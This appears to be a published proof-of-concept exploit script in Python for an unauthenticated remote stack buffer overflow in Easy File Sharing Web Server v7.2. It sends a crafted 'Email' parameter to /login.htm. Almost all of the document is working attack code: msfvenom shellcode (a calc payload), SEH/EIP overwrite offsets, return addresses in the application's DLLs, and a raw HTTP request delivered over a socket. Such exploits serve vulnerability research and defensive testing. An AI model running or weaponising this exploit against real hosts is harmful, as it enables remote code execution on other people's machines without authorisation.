#!/usr/bin/python # Exploit Title: Easy File Sharing Web Server v7.2 - POST 'Email' Unauthenticated Remote Buffer Overflow # Exploit Author: boku (aka Bobby Cooke) # Date: February 7th, 2020 # Vendor Homepage: http://www.sharing-file.com/ # Software Link: http://www.sharing-file.com/efssetup.exe # Version: 7.2 # Tested On: Microsoft Windows 10 Home - 10.0.18363 Build 18263 - x64-based PC # Microsoft Windows 10 Home - 10.0.18363 Build 18363 - x86-based PC # Microsoft Windows 10 Pro - 10.0.18363 Build 18363 - x86-based PC # Microsoft Windows 10 Edu - 10.0.18363 Build 18363 - x86-based PC # About: Easy File Sharing Web Server v7.2 suffers from a stack buffer overflow. This overflow can be triggered from an unauthenticated, # remote user via a malformed HTTP POST request. The application fails to properly handle the 'Email' parameter when sending a malformed # POST request to /login.htm. This POST request is triggered from the /register.ghp page, when completing the registration form to create # an account. The application has front-end javascript code that attempts to mitigate this, but the js is easily bypassed by sending to the # socket directly. # Recreate: # 1) Download & install Easy File Sharing Web Server v7.2 # 2) Open the Application, the HTTP server should begin running on ports 80 & 443 # 3) Change the 'host' variable below to the IP to the target devices IP # 4) Run this python script # 5) The program will crash and calculator will open import socket host = "192.168.70.134" port = 80 nops = '\x90'*200 # Bad char = \x00,\x3b # Expanding the buffer past 4028 bytes causes SEH to trigger # root@kali# msfvenom -p windows/exec CMD=calc -b '\x00\x3b' -f python -v shellcode # Payload size: 216 bytes shellcode = b"" shellcode += b"\xda\xcf\xbe\x33\x02\x8e\x27\xd9\x74\x24\xf4" shellcode += b"\x5a\x33\xc9\xb1\x30\x31\x72\x18\x83\xc2\x04" shellcode += b"\x03\x72\x27\xe0\x7b\xdb\xaf\x66\x83\x24\x2f" shellcode += b"\x07\x0d\xc1\x1e\x07\x69\x81\x30\xb7\xf9\xc7" shellcode += b"\xbc\x3c\xaf\xf3\x37\x30\x78\xf3\xf0\xff\x5e" shellcode += b"\x3a\x01\x53\xa2\x5d\x81\xae\xf7\xbd\xb8\x60" shellcode += b"\x0a\xbf\xfd\x9d\xe7\xed\x56\xe9\x5a\x02\xd3" shellcode += b"\xa7\x66\xa9\xaf\x26\xef\x4e\x67\x48\xde\xc0" shellcode += b"\xfc\x13\xc0\xe3\xd1\x2f\x49\xfc\x36\x15\x03" shellcode += b"\x77\x8c\xe1\x92\x51\xdd\x0a\x38\x9c\xd2\xf8" shellcode += b"\x40\xd8\xd4\xe2\x36\x10\x27\x9e\x40\xe7\x5a" shellcode += b"\x44\xc4\xfc\xfc\x0f\x7e\xd9\xfd\xdc\x19\xaa" shellcode += b"\xf1\xa9\x6e\xf4\x15\x2f\xa2\x8e\x21\xa4\x45" shellcode += b"\x41\xa0\xfe\x61\x45\xe9\xa5\x08\xdc\x57\x0b" shellcode += b"\x34\x3e\x38\xf4\x90\x34\xd4\xe1\xa8\x16\xb2" shellcode += b"\xf4\x3f\x2d\xf0\xf7\x3f\x2e\xa4\x9f\x0e\xa5" shellcode += b"\x2b\xe7\x8e\x6c\x08\x17\xc5\x2d\x38\xb0\x80" shellcode += b"\xa7\x79\xdd\x32\x12\xbd\xd8\xb0\x97\x3d\x1f" shellcode += b"\xa8\xdd\x38\x5b\x6e\x0d\x30\xf4\x1b\x31\xe7" shellcode += b"\xf5\x09\x52\x66\x66\xd1\x95" # + ECX & SEH offset @ 3996 offsetECX = '\xcc'*(3996-len(nops+shellcode)) CL = '\x42' CH = '\x3f' offsetEIP = '\x43'*8 high2bECX = '\x42\x42' # EIP overwrite at offset 4008 # - EBX holds PTR to payload in Heap # 043A7864 0271836C l.q. ASCII "newUser&frmUserPass=newPassword&frmUserPass2=newPassword&Email=Aa0Aa1.. # - Beginning of Payload at [EBX+-x3f] // (0x3f=63b) ret1 = '\x19\x1e\x01\x10' # 0x10011E19[ImageLoad.dll] # add byte ptr ds:[ebx], ch # ret # - After EIP overwrite ret, ESP is at +16 bytes offsetRet2 = '\x42'*12 ret2 = '\x5b\x02\xc4\x61' # 0x61c4025b[sqlite3.dll] # jmp [ebx] payload = nops+shellcode+offsetECX+CL+CH+high2bECX+offsetEIP+ret1+offsetRet2+ret2 httpRequest = "POST /login.htm HTTP/1.1\r\n" httpRequest += "Host: "+host+"\r\n" httpRequest += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n" httpRequest += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" httpRequest += "Accept-Language: en-US,en;q=0.5\r\n" httpRequest += "Accept-Encoding: gzip, deflate\r\n" httpRequest += "Referer: http://"+host+"/register.ghp\r\n" httpRequest += "Content-Type: application/x-www-form-urlencoded\r\n" httpRequest += "Connection: close\r\n" httpRequest += "Cookie: SESSIONID=16065; UserID=; PassWD=; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201\r\n" httpRequest += "Upgrade-Insecure-Requests: 1\r\n" httpRequest += "frmLogin=true&frmUserID=newUser&frmUserPass=newPassword&frmUserPass2=newPassword&Email="+payload+"&Avatar=&avatarURL=®ister=Register%21\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect = s.connect((host, port)) print("[+] Successfully connected to "+host) s.send(httpRequest) print("[+] Payload Sent") except: print("Failure to launch")